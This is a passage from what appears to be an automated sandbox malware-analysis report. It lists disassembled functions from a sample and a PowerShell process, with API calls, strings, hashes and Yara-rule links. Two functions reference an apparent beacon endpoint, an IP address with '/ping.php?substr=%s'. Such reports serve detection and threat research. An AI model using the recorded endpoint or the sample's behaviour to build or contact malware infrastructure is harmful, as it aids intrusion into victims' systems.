Instruction ID: f1d65ff4a2caa8f4402a5ee0af87b259506669f2abbd9cc63769bcbaa0b6a130
Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction Fuzzy Hash: 1D012D32500108BBDF116F96CC81DEF7F69EF99758F044129FE0866261D73AE861EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05C9CF11 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 05C9CF2B

Part of subcall function 05C9CE78: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 05C9CEA7
Part of subcall function 05C9CE78: ___AdjustPointer.LIBCMT ref: 05C9CEC2

_UnwindNestedFrames.LIBCMT ref: 05C9CF40
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 05C9CF51
CallCatchBlock.LIBVCRUNTIME ref: 05C9CF79

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction ID: 138bd6263e99bde33f720dd6f506641d017a605f11bcaee80b990b75a5f8ffdc
Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction Fuzzy Hash: EA014032200108BBCF156E95CC49EEB7F69FF59754F044404FE09A6120D735D961EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05CA74BA Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,05C9ED94,00000000,00000000,?,05CA7461,05C9ED94,00000000,00000000,00000000,?,05CA7719,00000006,0042F348), ref: 05CA74EC
GetLastError.KERNEL32(?,05CA7461,05C9ED94,00000000,00000000,00000000,?,05CA7719,00000006,0042F348,0042F340,0042F348,00000000,00000364,?,05CA7052), ref: 05CA74F8
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,05CA7461,05C9ED94,00000000,00000000,00000000,?,05CA7719,00000006,0042F348,0042F340,0042F348,00000000), ref: 05CA7506

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction ID: 1ff0fa779abd26bc56befc9e668d317330c3c8904d0d81ed83f8f7df94227540
Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction Fuzzy Hash: 8501D43775522B9BD7318B69AC48E667FD9FF046A5B500D30FA0AD3180DB20DA01C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 0041293D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004129CD

Strings

pow, xrefs: 004129A5, 004129C2

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
Instruction ID: 0a9ba9cf01538bb623dd895b254acf0ed02b79a8d0ee48bda8380b1111d13792
Opcode Fuzzy Hash: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
Instruction Fuzzy Hash: 3651607175420196C7217718DF813FB6BA0EB40750F64497BE085C23A9EB7D8CE6DA8E

Uniqueness

Uniqueness Score: -1.00%

Function 0041DDFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DE21

Strings

, xrefs: 0041DE66
.A, xrefs: 0041DE13

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: Info
String ID: $.A
API String ID: 1807457897-2696116503
Opcode ID: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
Instruction ID: bc213980aac5c6bda6009a83c5849e62ad2cee4ae6a6ae2e32fe98ed2f123d1c
Opcode Fuzzy Hash: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
Instruction Fuzzy Hash: EA410AF190434C9EDB218E248D84BFABBB9DF55304F1404EEE58A97142D23DAA86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 05C9A937 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 05C9A96A
__IsNonwritableInCurrentImage.LIBCMT ref: 05C9AA23

Strings

csm, xrefs: 05C9AA0D

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction ID: 67bb6eaf768503428b61b1f0ababa5a616f8d3b5321074b3e300e889d302ac49
Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction Fuzzy Hash: 54410634B00209EBCF18DF29CC8CAAEBBB5BF45314F158855E8166B391CB719A55CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0041FD92 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0041FFED,?,00000050,?,?,?,?,?), ref: 0041FE6D

Strings

OCP, xrefs: 0041FDE6
ACP, xrefs: 0041FDB0

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction ID: db8a1e39b5ed56134af0dcb237998205fad8b660637b78a6cadd581e1e0cf4fb
Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction Fuzzy Hash: 20213872A04301A6DB308E15D9017E7739A9B60B24F164077E90AC7312E73ADDC7C39C

Uniqueness

Uniqueness Score: -1.00%

Function 05CAFFF9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,05CB0254,?,00000050,?,?,?,?,?), ref: 05CB00D4

Strings

OCP, xrefs: 05CB004D
ACP, xrefs: 05CB0017

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction ID: a8a945ec903c64ee0e1141d9549acf3bc5d3ee26873730f4b647a30a109a6810
Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction Fuzzy Hash: C321D362A04105A6FB34CA55E909FEB72ABFB94B51F068D65EA0AF7100F7B7DA00C354

Uniqueness

Uniqueness Score: -1.00%

Function 05CB62B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05CB62B6

Part of subcall function 05C91E19: __EH_prolog.LIBCMT ref: 05C91E1E

Part of subcall function 05C9266A: __EH_prolog.LIBCMT ref: 05C9266F

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 05CB6398

Strings

,jC, xrefs: 05CB638D

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID: ,jC
API String ID: 420165198-3201430929
Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction ID: bb4fc2827b3a92833cbd6912112916457a432d0091b5238279e2c48acd5376b4
Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction Fuzzy Hash: B6310AB5E01119EBDB18EF94D989AEDF7B4FF48300F10856AD405A3640DB74AA48DF60

Uniqueness

Uniqueness Score: -1.00%

Function 004171B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00417217
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224

Strings

-@, xrefs: 004171EE, 00417202, 004171F3

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID: -@
API String ID: 2279764990-2564449678
Opcode ID: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
Instruction ID: 290a678ed3add9fd0faa91afd9d0ee705692a8110a20fb2286b59343c35ba588
Opcode Fuzzy Hash: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
Instruction Fuzzy Hash: 2B110A33A041209BAF369E19DC809DB73B5EB847247164172FD19AB354DA34DC86C6D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040356F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00403574

Strings

185.172.128.228, xrefs: 0040357B
/ping.php?substr=%s, xrefs: 0040357C

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228
API String ID: 3519838083-3577573015
Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction ID: 7b6dfb3f8f1c8d27c76164ee4eac5e21074d72dd8ad347809e0f3e64fbe8a7e5
Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction Fuzzy Hash: 0F01C472A01114BBDB04AF899C41BAEF769EF45315F10013FF405E3292D3789E41C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 00402FE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402FEA
std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6

Strings

T*@, xrefs: 00402FFA

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
String ID: T*@
API String ID: 4198646248-2370032326
Opcode ID: 3ec9199d66afed3907134f97eebd3b9b00bf7a97696591750704becf4680ddf6
Instruction ID: f5781f1056de0421007c94b05f43b79da385089699a731dc7870890d3004fbc1
Opcode Fuzzy Hash: 3ec9199d66afed3907134f97eebd3b9b00bf7a97696591750704becf4680ddf6
Instruction Fuzzy Hash: 8B21B0B5A00A06AFC305DF6AD580995FBF4FF49314B41826FE809D7B50E774A924CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 05C937D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05C937DB

Strings

185.172.128.228, xrefs: 05C937E2
/ping.php?substr=%s, xrefs: 05C937E3

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228
API String ID: 3519838083-3577573015
Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction ID: 4b5f956bc2c9cbeb86a62391a8c31a90b0f2ff27ba301e5242b776dba3a3488a
Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction Fuzzy Hash: 7B0100B2B04555ABEB09EF88DC48BAEF7B8FF45610F14092AF805D3240D3B49A10C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 0040436E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00404373

Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47

__Getcoll.LIBCPMT ref: 004043CF

Strings

u@@, xrefs: 004043C9

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: H_prolog$Getcoll
String ID: u@@
API String ID: 206117190-736001340
Opcode ID: 270736e8c7e434f475df5a6f2add70e77253c20f60e327508c33da834ea4415e
Instruction ID: 69c11f36173d25db8645085f4dff982521935f2d07d38959ddb20a2960a7de4d
Opcode Fuzzy Hash: 270736e8c7e434f475df5a6f2add70e77253c20f60e327508c33da834ea4415e
Instruction Fuzzy Hash: B21170B19012099FCB04EFA9D581A9EB7B4FF44304F10843FE555BB281DB789A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6D4 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A76A
GetLastError.KERNEL32 ref: 0041A778
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A7D3

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 6e686536444b783a84211067d30db666084dfc2c0494af9a85d7f06e58f7e852
Instruction ID: a04565de271e9a0d08a9f39f26722ecfcdc9a59ce40c97fd2178d4ba0242ee74
Opcode Fuzzy Hash: 6e686536444b783a84211067d30db666084dfc2c0494af9a85d7f06e58f7e852
Instruction Fuzzy Hash: 5541E934602246AFCF219F69C9447FB7BB4EF01310F14416AEC6997291D738CDA2C75A

Uniqueness

Uniqueness Score: -1.00%

Function 05CAA93B Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 05CAA9D1
GetLastError.KERNEL32 ref: 05CAA9DF
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 05CAAA3A

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
Instruction ID: 3afd369ead0f46b6ec242602bbee6bced2ba1a8ae964c40907909e63a2e7129a
Opcode Fuzzy Hash: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
Instruction Fuzzy Hash: 6C41C333604207AFCB21CFA5CD48BBE7FE5AF01318F154969E85AA71A4D7308E01CB64

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 6980, Parent PID: 1048COMMON

Executed Functions

Function 07832128 Relevance: 5.6, Strings: 4, Instructions: 648COMMON

Download Yara Rule

Strings

4']q, xrefs: 078325C0
4']q, xrefs: 07832466
4']q, xrefs: 078325CA
4']q, xrefs: 07832470

Memory Dump Source

Source File: 00000007.00000002.2130178307.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: eba81b30ccc57fdd237622882282ce075bc6d3324e01ea91b9cacbe021e8bd39
Instruction ID: 334d0f4ab276f4036c3b6178a2a3098400c7c68d6b6a3d282d09a392f4406ca7
Opcode Fuzzy Hash: eba81b30ccc57fdd237622882282ce075bc6d3324e01ea91b9cacbe021e8bd39
Instruction Fuzzy Hash: FB2256F1B043169FCB149F6C8911B6ABBA6BFE5310F1980AAD505CB291DB35D881C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 07830590 Relevance: 5.4, Strings: 4, Instructions: 447COMMON

Download Yara Rule

Strings

4']q, xrefs: 078307EA
4']q, xrefs: 07830694
4']q, xrefs: 07830688
4']q, xrefs: 078307F6

Memory Dump Source

Source File: 00000007.00000002.2130178307.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: c062d801ae9b782e8b80b7da76f8c19fa8dac544c2e06c6ed41cfaaa4d4c8b11
Instruction ID: 2b76e47440983815e4a01433c44d15a2f972f6a5e3e11c718c5ceaed972e3e38
Opcode Fuzzy Hash: c062d801ae9b782e8b80b7da76f8c19fa8dac544c2e06c6ed41cfaaa4d4c8b11
Instruction Fuzzy Hash: 4CE146F170434A8FCB159F7C881176ABBA3EF95311F1480AAD845CB292EB35D881C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 031F5630 Relevance: .5, Instructions: 494COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2106256093.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_31f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac94b5aa77f1702de2344eaac7c919859c6a99f8eaadb25436804c8aae5501b8
Instruction ID: 72545ac1907c56704d21bcf6271af94efade9e333c6e82ec8dffa35c0b5b345a
Opcode Fuzzy Hash: ac94b5aa77f1702de2344eaac7c919859c6a99f8eaadb25436804c8aae5501b8
Instruction Fuzzy Hash: 88221974A01209DFCB14DF98C494AADFBB2FF49310F298599E959AB361C735EC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 07832109 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2130178307.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7830000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef7690267d94c516104b873cd2f5fea72a5b679b63453bcd29f9dae85ba25068
Instruction ID: c5372ae195787bd3785e9136423fd18b16d2bd70ee870e4a9af0c58c5a2171a7
Opcode Fuzzy Hash: ef7690267d94c516104b873cd2f5fea72a5b679b63453bcd29f9dae85ba25068
Instruction Fuzzy Hash: AF4106F16003129FCB148F6CCE41B6ABBA6BFA5354F194096D900DF2A6DB35E941CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0783086C Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2130178307.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7830000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d68799ba30e5b1efbb0723f080f1a28cd10afa2d4fdb3bc7225cccf972aee3b
Instruction ID: 4510c0615b9b79b15e587d012a84cbe435f935fa8fb881f5d6d649522df2f5ed
Opcode Fuzzy Hash: 7d68799ba30e5b1efbb0723f080f1a28cd10afa2d4fdb3bc7225cccf972aee3b
Instruction Fuzzy Hash: 7A31C2F161420ADFEB24CF2CC9157AA77A7EF60355F048165E814CB291DB35D980C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 031F4820 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2106256093.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_31f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 605b63f7d38498f9ebd2f60a21e3bbe0f8ea7dda371661e2f3e6a138cce345df
Instruction ID: edec95b212c73e4b3fbc5c72ae9921acff0fc990f509a0c37436a68554917c3f
Opcode Fuzzy Hash: 605b63f7d38498f9ebd2f60a21e3bbe0f8ea7dda371661e2f3e6a138cce345df
Instruction Fuzzy Hash: 4A214974A042499FCB04CF9DC8909AABBB5FF89300B15809AD919EB352C735EC41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 031F4810 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2106256093.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_31f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cac60c0463d2ab735fa9b6ad553cdfb361789afaa8ba619ec584a1fe245e7fa6
Instruction ID: ccb32f8ceb28591573e0343f74d2789293452e3e49bd96111ffc6a600aa3b02f
Opcode Fuzzy Hash: cac60c0463d2ab735fa9b6ad553cdfb361789afaa8ba619ec584a1fe245e7fa6
Instruction Fuzzy Hash: 8B21D874A002499FCB04DF99C4909AEBBB1FF89310B15859AD919AB362C731EC51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 031F2C75 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2106256093.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_31f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7bc5bcdb631074973c98d77753a673a70a28de6efd25fb744846fe4f80bd5e
Instruction ID: 9d50313a34a30427b3f52998a37131335e0af7468f3c6e385f25f05f94404ec7
Opcode Fuzzy Hash: 3d7bc5bcdb631074973c98d77753a673a70a28de6efd25fb744846fe4f80bd5e
Instruction Fuzzy Hash: 4411703160E3D14FDB03DB6898B05E97F709F47220B1945C7D4988F1E3C62A494AD766

Uniqueness

Uniqueness Score: -1.00%

Function 02FED01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2105371759.0000000002FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ba33c74f7a2d054762c42001422cf7c39988f6dbd1fc1fb6af279243b4621c2
Instruction ID: 1e5c48b07bbec3d120b33c468c95d2f88b86808feb7634a18d3094f976e28b85
Opcode Fuzzy Hash: 5ba33c74f7a2d054762c42001422cf7c39988f6dbd1fc1fb6af279243b4621c2
Instruction Fuzzy Hash: 7901F7715053409AEB118A15CDC4767BF9CDF417A4F1CC41AEF0A0A54AC3799846C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 02FED005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2105371759.0000000002FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98a05f277c0867e103d2710528e3957feefc2f0b94fd70091cc68aa61f23792f
Instruction ID: 7b838c882835b43dde64164a15ccc3d325ff6ce4229ebdcefcca30de698a638b
Opcode Fuzzy Hash: 98a05f277c0867e103d2710528e3957feefc2f0b94fd70091cc68aa61f23792f
Instruction Fuzzy Hash: 7801696140E3C05ED7128B258994B62BFB8DF43624F0DC1DBD9888F1A7C2694849C772

Uniqueness

Uniqueness Score: -1.00%

Function 031F2C06 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2106256093.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_31f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 852660fc984580af2d9c3eae9cb2825598f5ca1918fde58ccee6145d300bd864
Instruction ID: 9f74f7bd99f329481cf3f0eff9a028af9b5f4eb3aa2f86df4ff00bdacab32da0
Opcode Fuzzy Hash: 852660fc984580af2d9c3eae9cb2825598f5ca1918fde58ccee6145d300bd864
Instruction Fuzzy Hash: 00F0DA35A001059FCB15CF9DD890AEEF7B1FF88324F248159E519A72A1C736AC52CB50

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 07831788 Relevance: 14.2, Strings: 11, Instructions: 487COMMON

Download Yara Rule

Strings

$]q, xrefs: 0783179A
tP]q, xrefs: 07831811
4']q, xrefs: 078319F9
sl, xrefs: 0783187D
sl, xrefs: 0783186F
sl, xrefs: 07831D18
4']q, xrefs: 078319EF
$]q, xrefs: 078317C0
sl, xrefs: 07831D26
tP]q, xrefs: 07831805
$]q, xrefs: 078317CC

Memory Dump Source

Source File: 00000007.00000002.2130178307.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$sl$sl$sl$sl
API String ID: 0-1276679885
Opcode ID: ad946513b7d7bc35e0de8edc3e1d0054d0576ed1471adb80b3c43d1a5e3f450f
Instruction ID: 6e0d2b65cb41a86ccc16d6c3518de98c64e9f4e3b80c16acb4ea28cf7ee8eaef
Opcode Fuzzy Hash: ad946513b7d7bc35e0de8edc3e1d0054d0576ed1471adb80b3c43d1a5e3f450f
Instruction Fuzzy Hash: 8BF139B2F0420A8FCB149F6DC4096AABBE2EFD6B21F15847AD505CB251DB31D841C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 07830AD8 Relevance: 12.8, Strings: 10, Instructions: 312COMMON

Download Yara Rule

Strings

$]q, xrefs: 07830CEC
4']q, xrefs: 07830BDB
$]q, xrefs: 07830CE0
#mk, xrefs: 07830BA7
sl, xrefs: 07830D9D
sl, xrefs: 07830D8F
tP]q, xrefs: 07830D31
